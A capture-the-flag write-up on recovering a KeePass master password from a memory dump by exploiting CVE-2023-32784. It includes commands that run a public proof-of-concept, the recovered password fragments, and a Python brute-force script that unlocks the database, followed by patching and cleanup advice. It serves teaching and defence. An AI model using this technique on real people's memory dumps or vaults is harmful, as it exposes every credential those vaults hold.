Forensics
Hard
400 points

Unlocked

Recuite 2025 - HCMUS
6 tháng 10, 2025
KeePass
CVE-2023-32784
Memory Dump
Password Recovery
Recuite 2025 - HCMUS
Forensics

Unlocked - Writeup#

Challenge Information#

  • Category: Forensics
  • Files: Database.kdbx, KeePass.DMP (272MB)
  • Vulnerability: CVE-2023-32784

Overview#

Exploit CVE-2023-32784: Critical KeePass 2.X vulnerability allowing master password extraction from memory dumps.

Understanding CVE-2023-32784#

The Vulnerability#

KeePass uses custom SecureTextBoxEx for password entry:

  • For every character typed, leftover string created in memory
  • .NET memory management can't easily remove these
  • Typing "Password" creates: ●a, ●●s, ●●●s, ●●●●w, ●●●●●o, ●●●●●●r, ●●●●●●●d
  • First character lost, but all others recoverable!

Impact#

  • Works on process dumps, swap, hibernation, crash dumps, RAM dumps
  • Works regardless of workspace lock
  • No code execution required
  • Can work after KeePass closed (reliability decreases)

Exploitation#

Step 1: Extract Password Pattern#

bash
git clone https://github.com/CMEPW/keepass-dump-masterkey.git
python3 keepass-dump-masterkey/poc.py KeePass.DMP

Output:

Possible password: ●y_super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce
Possible password: ●'_super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce
...
Possible password: ●&_super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce

Analysis:

  • First character: Unknown (●)
  • Second character: 10 candidates (y, ', e, \, {, , C, (, S, &)
  • Remaining: _super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce
  • Note: Typo "confidental" → "confidential"

Step 2: Bruteforce First Two Characters#

python
from pykeepass import PyKeePass
import string

suffix = "_super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce"
second_chars = ['y', "'", 'e', '\\', '{', ' ', 'C', '(', 'S', '&']
first_chars = string.printable.strip()

for first in first_chars:
    for second in second_chars:
        password = first + second + suffix
        try:
            kp = PyKeePass('Database.kdbx', password=password)
            print(f"SUCCESS! Password: {password}")
        except:
            pass

Total: 94 × 10 = 940 attempts

Step 3: Database Unlocked!#

Password found after ~200 attempts:

my_super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce

Step 4: Extract Flag#

TitleUsernamePassword
FlagblackpinkerBPCTF{r3memb3r_2_upgr4de_k33pa5s_7o_v3rsion_2.54}

Flag#

BPCTF{r3memb3r_2_upgr4de_k33pa5s_7o_v3rsion_2.54}

Reminder: Upgrade to KeePass 2.54+ which fixes this vulnerability!

Key Takeaways#

Vulnerability Details#

  1. Affects KeePass 2.X before 2.54
  2. Caused by .NET memory management
  3. Only first character lost, rest recoverable
  4. Works on various memory artifacts
  5. Locking workspace doesn't prevent attack

Defense#

  • Update KeePass to 2.54+ immediately
  • Change master password if used affected version
  • Clean memory artifacts:
    • Delete crash dumps
    • Delete hibernation file (hiberfil.sys)
    • Delete pagefile/swapfile
    • Overwrite deleted data
    • Restart computer

Affected vs Not Affected#

Affected: KeePass 2.X (< 2.54) written in .NET

Not Affected:

  • KeePass 2.54+
  • KeePass 1.X
  • KeePassXC
  • Other non-.NET implementations

Tools#

  1. Python PoC
  2. PyKeePass - Database access
  3. Original C# PoC

Timeline#

  • May 2023: CVE discovered
  • June 2023: KeePass 2.54 released with fix
  • October 2025: This CTF challenge
400
Points
Hard
Difficulty
Forensics
Category

More Forensics Challenges

Mouse Cap

Medium
120 pts

Painted

Hard
500 pts

Cropped

Medium
250 pts